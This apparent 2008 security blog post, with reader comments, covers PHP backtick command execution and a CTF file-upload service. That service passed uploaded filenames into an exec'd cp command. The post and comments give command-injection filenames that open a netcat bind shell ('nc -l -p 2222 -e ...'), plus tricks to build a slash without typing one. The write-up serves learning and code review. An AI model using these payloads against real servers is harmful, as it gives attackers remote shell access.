Fun with Backticks

While chatting with some guys at the OWASP AppSecEU 08 I noticed that backticks are oftenly overlooked in PHP. I came across backticks myself just some time ago while researching vulnerable functions on php.net for my PHP Scanner and found this entry. So you can use something like

$foo = `command here`;

to execute OS commands just like using system, shell_exec and what have you. This was absolutely new to me, although I’ve been working with PHP for quite a while and can be easily overlooked when reviewing code or filtering on mentioned functions (which is an bad idea anyway ;))

While talking about backticks I remembered a quite interesting security hole given on the UCSB CTF 07 (in the service “copyright” for those of you who participated or want to have a shot at the image). The service allowed to upload files and the relevant PHP code looked like the following:

$target_path = "../../uploads/". basename( $_FILES['file']['name']);
$command = "cp ".escapeshellarg($_FILES['file']['tmp_name'])." ".$target_path;
exec($command, $out, $ret);

If you take a closer look at the code you will see that you can execute code by naming the file you are going to upload to something like

foo;ping localhost

since “;” are allowed in filenames and will add a new command after the cp command gets executed. The problem was that we needed slashes in our filename to execute “foo;nc -l -p 2222 -e /bin/bash” or copy some interesting files to the webdir with “../../../../var/www/Site”. Obviously you cant rename your file containing a slash or craft such a request because its still handled as a file by PHP and slashes would be dealed as directorys. Now my mate Freddy had the idea to use backticks again, because they work at the command line just like in PHP to execute commands and return their output:

foo;nc -l -p 2222 -e `nc -l -p 3333`

This code will wait for something passed on port 3333 and then execute the rest of it. So we connect to port 3333, enter /bin/bash and will finally get a remote shell.
As we figured out afterwards this was a fairly stupid workaround for just using nc -l -p 2222 -e `which bash`, but was plain fun anyway during the contest.

Interesting to note is also that backticks on commandline work in double quotes, but not in single quotes.

Advertisement

This entry was posted on Monday, May 26th, 2008 at 3:42 pm and is filed under CTF, PHP, Web Security. You can follow any responses to this entry through the RSS 2.0 feed. You can skip to the end and leave a response. Pinging is currently not allowed.

5 Responses to Fun with Backticks

  1. Anonymous says:
    August 10, 2008 at 4:45 pm

    Interesting bug. There are, of course, lot’s of tricks to encode characters in a shell command. Here’s one using only builtin shell commands:

    file; S=$(echo -e “\x2F”); eval “nc -l -p 1337 -e ${S}bin${S}bash”;

    $(command) is equivalent to `command`. You could also use sed, tr, perl, etc to encode/decode strings if those programs are available.

    Reply
  2. Reiners says:
    August 10, 2008 at 6:09 pm

    Hi !
    unfortunetly this wont work because you cant fake a “\” in file names 😉
    anyway, thanks for sharing your idea !

    Reply
  3. Reiners says:
    May 19, 2009 at 4:43 pm

    another idea to get a slash on command line would be:
    `pwd|head -c1`
    this returns the current directorys first character, which should always result in a “/”.

    Reply
  4. Freddy says:
    May 22, 2009 at 4:35 pm

    even better: ${PWD:0:1} shorter & doesn’t actually run a command

    Reply
  5. bhavana says:
    April 2, 2013 at 1:06 pm

    it can be escaped by using / simble

    Reply

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

%d bloggers like this: